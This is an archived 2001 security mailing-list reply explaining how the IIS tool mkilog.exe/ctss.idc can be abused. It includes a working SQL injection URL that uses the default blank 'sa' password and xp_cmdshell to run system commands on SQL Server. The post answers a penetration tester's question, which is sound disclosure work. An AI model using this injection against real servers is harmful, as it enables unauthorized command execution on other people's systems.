OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: H D Moore (hdmsecureaustin.com)
Date: Tue Jul 31 2001 - 12:50:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    mkilog.exe simply posts data to ctss.idc, which creates a table based on the
    parameters it gets:

    [ctss.idc]
    Datasource: %ds%
    Username: %user%
    Password: %pwd%
    Template: ct.htx
    SQLStatement:
    +create table %table% (
    +ClientHost varchar(50), username varchar(50),
    +LogTime datetime, service varchar( 20), machine varchar( 20),
    +serverip varchar( 50), processingtime int, bytesrecvd int,
    +bytessent int, servicestatus int, win32status int,
    +operation varchar( 200), target varchar(200), parameters text )

    If you pass a correct DataSource, User, and Password (LocalServer, sa, blank
    password for locally installed servers), then change the table to:

    bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

    You can use it to run system commands. In this case, the actual query you
    would send is (lines probably wrapped):

    /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh
    int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

    For every query you run you have to create another garbage table, so remeber
    to cleanup all those bogus tables when you are done.

    For some reason SQL Server 6.5 limits your command parameter to 30 characters
    when executed this way (which is _really_ annoying), I haven't been able to
    track down why yet. Goodluck!

    -HD

    http://www.digitaloffense.net (play)
    http://www.digitaldefense.net (work)

    On Tuesday 31 July 2001 06:48 am, César González wrote:
    > Hello all,
    >
    > I am making a penetration testing, and some vulnerability scanners alert
    > about the script mkilog.exe. Most exactly nessus said the following :
    >
    > The CGI /scripts/tools/mkilog.exe is present.
    >
    > This CGI allows an attacker to view and modify SQL database
    > contents.
    >
    > No securityfocus links, CVE advisory, etc. i have search most popular
    > security search engines but nothing appears. Any help will be appreciated.

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/